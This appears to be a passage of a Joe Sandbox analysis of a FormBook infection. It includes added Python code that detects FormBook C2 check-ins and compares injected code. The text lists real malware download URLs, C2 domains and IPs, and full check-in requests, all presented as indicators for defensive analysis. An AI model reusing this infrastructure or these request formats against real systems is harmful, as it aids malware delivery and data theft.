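CMSTP_FUNCS = ["9_2_000A7C85", "9_2_000A6C9B", "9_2_000A7CE2"]


def parse_func_id(func_id):
    """'7_2_00417CE2' -> (pid=7, run=2, address=0x417CE2)."""
    pid, run, addr = func_id.split("_")
    return int(pid), int(run), int(addr, 16)


def rva_set(func_ids, image_base):
    """Addresses normalised to offsets from the image base, as a set."""
    return {parse_func_id(f)[2] - image_base for f in func_ids}


def infer_shift(a_ids, b_ids):
    """If every address in a_ids is the same distance from the matching
    address in b_ids (same count, compared in sorted order), return that
    distance; otherwise None. A single constant shift is the signature of
    one image mapped at two different bases."""
    a = sorted(parse_func_id(f)[2] for f in a_ids)
    b = sorted(parse_func_id(f)[2] for f in b_ids)
    if len(a) != len(b) or not a:
        return None
    diffs = {x - y for x, y in zip(a, b)}
    return diffs.pop() if len(diffs) == 1 else None


def same_code(a_ids, a_base, b_ids, b_base):
    """True when both processes expose the identical set of RVAs."""
    return rva_set(a_ids, a_base) == rva_set(b_ids, b_base)


if __name__ == "__main__":
    shift = infer_shift(TWBCAZE_FUNCS, CMSTP_FUNCS)
    print("constant shift between address sets:", hex(shift) if shift is not None else "none")
    print("shared RVAs:", sorted(hex(r) for r in rva_set(TWBCAZE_FUNCS, TWBCAZE_BASE)))
    print("same code:", same_code(TWBCAZE_FUNCS, TWBCAZE_BASE, CMSTP_FUNCS, CMSTP_REGION_BASE))
```

The same normalisation is the quick way to confirm that a hollowed or injected region is the dropper's own image rather than a second payload: if the RVA sets line up, the code in the system process is the code in the dropped file, and the YARA and memory-dump findings for one apply to the other.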
Source: global traffic | TCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443 (multiple packets)
Source: global traffic | TCP traffic: 192.168.2.22:49161 -> 103.224.247.210:80
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 107.164.111.101:80
Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 3.33.130.190:80
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 103.150.181.71:80 (multiple packets)

          Networking

Source: C:\Windows\explorer.exe | Network Connect: 103.150.181.71 80
Source: C:\Windows\explorer.exe | Domain query: www.allamericanshuttlellc.com
Source: C:\Windows\explorer.exe | Domain query: www.6061k.vip
Source: C:\Windows\explorer.exe | Domain query: www.shucaimh.com
Source: C:\Windows\explorer.exe | Domain query: www.xazeyu.net
Source: C:\Windows\explorer.exe | Network Connect: 3.33.130.190 80
Source: C:\Windows\explorer.exe | Network Connect: 107.164.111.101 80
Source: Traffic | Snort IDS: 2021697 ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious 192.168.2.22:49161 -> 103.224.247.210:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49165 -> 107.164.111.101:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 3.33.130.190:80
Source: Malware configuration extractor | URLs: www.guimisha.com/t2ti/
Source: Joe Sandbox View | JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: global traffic | HTTP traffic detected: GET /t2ti/?4hO02rc=giwc8XVj/AkHwdj5caWP9R2rVnZav6a8h1CJcH9em0U/x824OxogtA/AOr9gMChFXFyvXA==&ll=NdqLMf HTTP/1.1 | Host: www.shucaimh.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /t2ti/?ll=NdqLMf&4hO02rc=qDIrkJK7+k7t2cKm0yqLDiQOFM/oPqsB85v8vrvlTOlWprVZbJOF5qoRsr2uTLTXyB6S3g== HTTP/1.1 | Host: www.6061k.vip | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /t2ti/?4hO02rc=7DxIxXtD0cmaaH8JRCp3g1LIg+NFO3IPyGr0LK1dljwtKxPhU92HBtbpaOBLFPespYq5Bw==&ll=NdqLMf HTTP/1.1 | Host: www.xazeyu.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (same request observed 7 times)
Source: global traffic | HTTP traffic detected: GET /wp-content/uploads/wpr-addons/forms/balokarat2.1.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Connection: Keep-Alive | Host: swamini.in
Source: global traffic | HTTP traffic detected: GET /wp-content/uploads/wpr-addons/forms/balokarat2.1.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: swamini.in | Connection: Keep-Alive
Source: Joe Sandbox View | ASN Name: NANBIAN-CNNingboNanbianTuoluoXinxiJishuCoLtdCN
Source: Joe Sandbox View | ASN Name: AMAZONEXPANSIONGB
Source: Joe Sandbox View | ASN Name: EGIHOSTINGUS
Source: Joe Sandbox View | IP Address: 3.33.130.190
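The check-in requests listed above share one shape: a GET to a single short path segment (/t2ti/) on a host from the extracted configuration, a query of exactly two parameters (one a base64 blob, the other the short token ll=NdqLMf), Connection: close, and a 7-byte all-zero body on a GET, which is the pattern Snort flagged as "FormBook CnC Checkin (GET)". The Python below is an added example, not part of the Joe Sandbox report, that scores request records against exactly those observable features. The (method, target, headers, body) record format, the threshold of three matching features, and the "benign" and "near_miss" records are constructed for the example; the three check-in records reproduce requests from the report, and the C2 host set is taken from the URLs the report lists.

```python
"""Added example, not part of the Joe Sandbox report: flag FormBook-style
C2 check-ins using only the features visible in the report's HTTP records.

A request record here is a constructed (method, target, headers, body) tuple,
a simplification of whatever proxy or sandbox log format is actually at hand."""

import base64
import binascii
import re
from urllib.parse import urlsplit

# Hosts and path shape taken from the report's configuration / memory strings
C2_PATH_RE = re.compile(r"^/[a-z0-9]{3,6}/$")
C2_HOSTS = {
    "www.guimisha.com", "www.6061k.vip", "www.shucaimh.com", "www.xazeyu.net",
    "www.allamericanshuttlellc.com", "www.albertcolet.com", "www.alishopogolic.com",
    "www.fxzx01.icu", "www.hhmhhhbh.xyz",
}
B64_RE = re.compile(r"^[A-Za-z0-9+/]{20,}={0,2}$")
TOKEN_RE = re.compile(r"^[A-Za-z0-9]{4,8}$")
THRESHOLD = 3  # assumption for the example: three of four features => check-in


def parse_query(query):
    """Split the raw query WITHOUT '+'-to-space decoding: the check-ins carry
    raw base64 (which may contain '+' and '/') directly in the query string,
    so urllib.parse.parse_qsl would corrupt the blob."""
    params = {}
    for part in query.split("&"):
        if part:
            key, _, value = part.partition("=")
            params[key] = value
    return params


def looks_base64(value):
    """Canonical-length, alphabet-valid base64 of at least 20 characters."""
    if not B64_RE.match(value) or len(value) % 4:
        return False
    try:
        base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return False
    return True


def score_request(method, target, headers, body):
    """Return (score, reasons) for one request record."""
    reasons = []
    url = urlsplit(target)
    host = headers.get("Host", "").lower()
    params = parse_query(url.query)
    if host in C2_HOSTS:
        reasons.append("host in extracted C2 list")
    if C2_PATH_RE.match(url.path):
        reasons.append("single short path segment")
    values = list(params.values())
    if len(values) == 2 and any(looks_base64(v) for v in values) \
            and any(TOKEN_RE.match(v) for v in values):
        reasons.append("two-parameter query: base64 blob plus short token")
    if method == "GET" and headers.get("Connection", "").lower() == "close" \
            and body and body == b"\x00" * len(body):
        reasons.append("GET with %d-byte all-zero body" % len(body))
    return len(reasons), reasons


def is_formbook_checkin(method, target, headers, body):
    return score_request(method, target, headers, body)[0] >= THRESHOLD


# The first three records reproduce requests from the report; "benign" and
# "near_miss" are constructed for the example.
SAMPLE_REQUESTS = {
    "shucaimh": ("GET",
        "/t2ti/?4hO02rc=giwc8XVj/AkHwdj5caWP9R2rVnZav6a8h1CJcH9em0U/x824OxogtA/AOr9gMChFXFyvXA==&ll=NdqLMf",
        {"Host": "www.shucaimh.com", "Connection": "close"}, b"\x00" * 7),
    "6061k": ("GET",
        "/t2ti/?ll=NdqLMf&4hO02rc=qDIrkJK7+k7t2cKm0yqLDiQOFM/oPqsB85v8vrvlTOlWprVZbJOF5qoRsr2uTLTXyB6S3g==",
        {"Host": "www.6061k.vip", "Connection": "close"}, b"\x00" * 7),
    "xazeyu": ("GET",
        "/t2ti/?4hO02rc=7DxIxXtD0cmaaH8JRCp3g1LIg+NFO3IPyGr0LK1dljwtKxPhU92HBtbpaOBLFPespYq5Bw==&ll=NdqLMf",
        {"Host": "www.xazeyu.net", "Connection": "close"}, b"\x00" * 7),
    "benign": ("GET", "/index.html",
        {"Host": "www.example.com", "Connection": "keep-alive"}, b""),
    "near_miss": ("GET", "/t2ti/?4hO02rc=AAAA&ll=x",
        {"Host": "cdn.example.net", "Connection": "close"}, b""),
}


def classify_all(records=SAMPLE_REQUESTS):
    return {name: is_formbook_checkin(*rec) for name, rec in records.items()}


if __name__ == "__main__":
    for name, rec in SAMPLE_REQUESTS.items():
        print(name, score_request(*rec))
```

The host-list feature is the brittle one: FormBook rotates through a list of decoy and live domains (the memory strings below show the chain), so a host-only match will lag every new configuration. The structural features (short path, two-parameter base64 query, close-connection GET with a null body) are what the IDS signature keys on and what survives a domain change, which is why the score is built from all four rather than from the host alone.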
Source: EQNEDT32.EXE, 00000002.00000002.354206908.0000000000317000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.354000639.0000000000310000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: EQNEDT32.EXE, 00000002.00000002.354206908.0000000000317000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.354000639.0000000000310000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: EQNEDT32.EXE, 00000002.00000002.354206908.0000000000317000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.354000639.0000000000310000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: EQNEDT32.EXE, 00000002.00000002.354206908.0000000000317000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.354000639.0000000000310000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: EQNEDT32.EXE, 00000002.00000002.354206908.0000000000317000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.354000639.0000000000310000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: EQNEDT32.EXE, 00000002.00000002.354206908.0000000000317000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.354000639.0000000000310000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: EQNEDT32.EXE, 00000002.00000002.354206908.0000000000317000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.354000639.0000000000310000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: EQNEDT32.EXE, 00000002.00000002.354206908.0000000000317000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.354000639.0000000000310000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.use
Source: explorer.exe, 00000008.00000000.353969269.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.879285316.00000000001D6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://java.sun.com
Source: word.exe, word.exe, 00000005.00000000.351583902.0000000000409000.00000008.00000001.01000000.00000004.sdmp, word.exe, 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmp, balokarat2.1[1].exe.2.dr, word.exe.2.dr | String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: EQNEDT32.EXE, 00000002.00000003.353995693.0000000000357000.00000004.00000020.00020000.00000000.sdmp, word.exe, 00000005.00000000.351583902.0000000000409000.00000008.00000001.01000000.00000004.sdmp, word.exe, 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmp, balokarat2.1[1].exe.2.dr, word.exe.2.dr | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: EQNEDT32.EXE, 00000002.00000002.354206908.0000000000317000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.354000639.0000000000310000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
Source: EQNEDT32.EXE, 00000002.00000002.354206908.0000000000317000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.354000639.0000000000310000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0%
Source: EQNEDT32.EXE, 00000002.00000002.354206908.0000000000317000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.354000639.0000000000310000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0-
Source: EQNEDT32.EXE, 00000002.00000002.354206908.0000000000317000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.354000639.0000000000310000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0/
Source: EQNEDT32.EXE, 00000002.00000002.354206908.0000000000317000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.354000639.0000000000310000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com05
Source: EQNEDT32.EXE, 00000002.00000002.354206908.0000000000317000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.354000639.0000000000310000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.entrust.net03
Source: EQNEDT32.EXE, 00000002.00000002.354206908.0000000000317000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.354000639.0000000000310000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.entrust.net0D
Source: explorer.exe, 00000008.00000002.881102573.000000000891F000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 00000009.00000002.879666706.000000000293F000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: http://push.zhanzhang.baidu.com/push.js
Source: EQNEDT32.EXE, 00000002.00000002.354164250.000000000028F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://swamini.in/wp-content/uploads/wpr-addons/forms/balokarat2.1.exe
Source: EQNEDT32.EXE, 00000002.00000002.354164250.000000000028F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://swamini.in/wp-content/uploads/wpr-addons/forms/balokarat2.1.exej
Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.6061k.vip
Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.6061k.vip/t2ti/
Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.6061k.vip/t2ti/www.xazeyu.net
Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.6061k.vipReferer:
Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.albertcolet.com
Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.albertcolet.com/t2ti/
Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.albertcolet.com/t2ti/www.guimisha.com
Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.albertcolet.comReferer:
Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.alishopogolic.com
Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.alishopogolic.com/t2ti/
Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.alishopogolic.com/t2ti/www.maquibotanic.com
Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.alishopogolic.comReferer:
Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.allamericanshuttlellc.com
Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.allamericanshuttlellc.com/t2ti/
Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.allamericanshuttlellc.com/t2ti/www.shucaimh.com
Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.allamericanshuttlellc.comReferer:
Source: explorer.exe, 00000008.00000000.353969269.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.879285316.00000000001D6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3
Source: EQNEDT32.EXE, 00000002.00000002.354206908.0000000000317000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.354000639.0000000000310000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: EQNEDT32.EXE, 00000002.00000002.354206908.0000000000317000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.354000639.0000000000310000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.fxzx01.icu
Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.fxzx01.icu/t2ti/
Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.fxzx01.icu/t2ti/www.albertcolet.com
Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.fxzx01.icuReferer:
Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.guimisha.com
Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.guimisha.com/t2ti/
Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.guimisha.com/t2ti/www.ssongg10292.cfd
Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.guimisha.comReferer:
Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.hhmhhhbh.xyz
Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.hhmhhhbh.xyz/t2ti/
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hhmhhhbh.xyz/t2ti/www.techsterverse.life
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hhmhhhbh.xyzReferer:
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.janenas.top
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.janenas.top/t2ti/
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.janenas.top/t2ti/www.alishopogolic.com
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.janenas.topReferer:
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.maquibotanic.com
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.maquibotanic.com/t2ti/
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.maquibotanic.comReferer:
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.michealwilshire.online
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.michealwilshire.online/t2ti/
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.michealwilshire.online/t2ti/www.janenas.top
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.michealwilshire.onlineReferer:
          Source: explorer.exe, 00000008.00000000.355385878.0000000005E08000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.com0
          Source: explorer.exe, 00000008.00000000.356321404.0000000007968000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.880897164.0000000007997000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.880897164.00000000078DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.879757216.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.880897164.000000000795D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.354623320.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.356321404.00000000078DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.880167411.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.354257988.000000000260E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000008.00000002.880897164.00000000078DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://
          Source: explorer.exe, 00000008.00000000.356321404.0000000007968000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.880897164.0000000007997000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.879757216.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.880897164.000000000795D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.354623320.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.356321404.00000000078DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.880167411.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.354257988.000000000260E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000008.00000002.879757216.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.354257988.000000000260E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerxe
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.shucaimh.com
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.shucaimh.com/t2ti/
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.shucaimh.com/t2ti/www.6061k.vip
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.shucaimh.comReferer:
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.spacecargo.net
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.spacecargo.net/t2ti/
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.spacecargo.net/t2ti/www.michealwilshire.online
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.spacecargo.netReferer:
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ssongg10292.cfd
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ssongg10292.cfd/t2ti/
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ssongg10292.cfd/t2ti/www.hhmhhhbh.xyz
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ssongg10292.cfdReferer:
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.techsterverse.life
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.techsterverse.life/t2ti/
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.techsterverse.life/t2ti/www.www32561b.com
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.techsterverse.lifeReferer:
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.www32561b.com
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.www32561b.com/t2ti/
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.www32561b.com/t2ti/www.spacecargo.net
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.www32561b.comReferer:
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xazeyu.net
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xazeyu.net/t2ti/
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xazeyu.net/t2ti/www.fxzx01.icu
          Source: explorer.exe, 00000008.00000002.880897164.0000000007968000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xazeyu.netReferer:
          Source: EQNEDT32.EXE, 00000002.00000002.354206908.0000000000317000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.354000639.0000000000310000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
          Source: explorer.exe, 00000008.00000000.353969269.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.879285316.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
          Source: EQNEDT32.EXE, 00000002.00000002.354183793.00000000002E5000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.354079033.00000000002E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swamini.in/
          Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.354183793.00000000002E5000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.353995693.0000000000357000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.354079033.00000000002E5000.00000004.00000020.00020000.00000000.sdmp, balokarat2.1[1].htm.2.drString found in binary or memory: https://swamini.in/wp-content/uploads/wpr-addons/forms/balokarat2.1.exe
          Source: EQNEDT32.EXE, 00000002.00000003.353995693.0000000000357000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swamini.in/wp-content/uploads/wpr-addons/forms/balokarat2.1.exeemC:
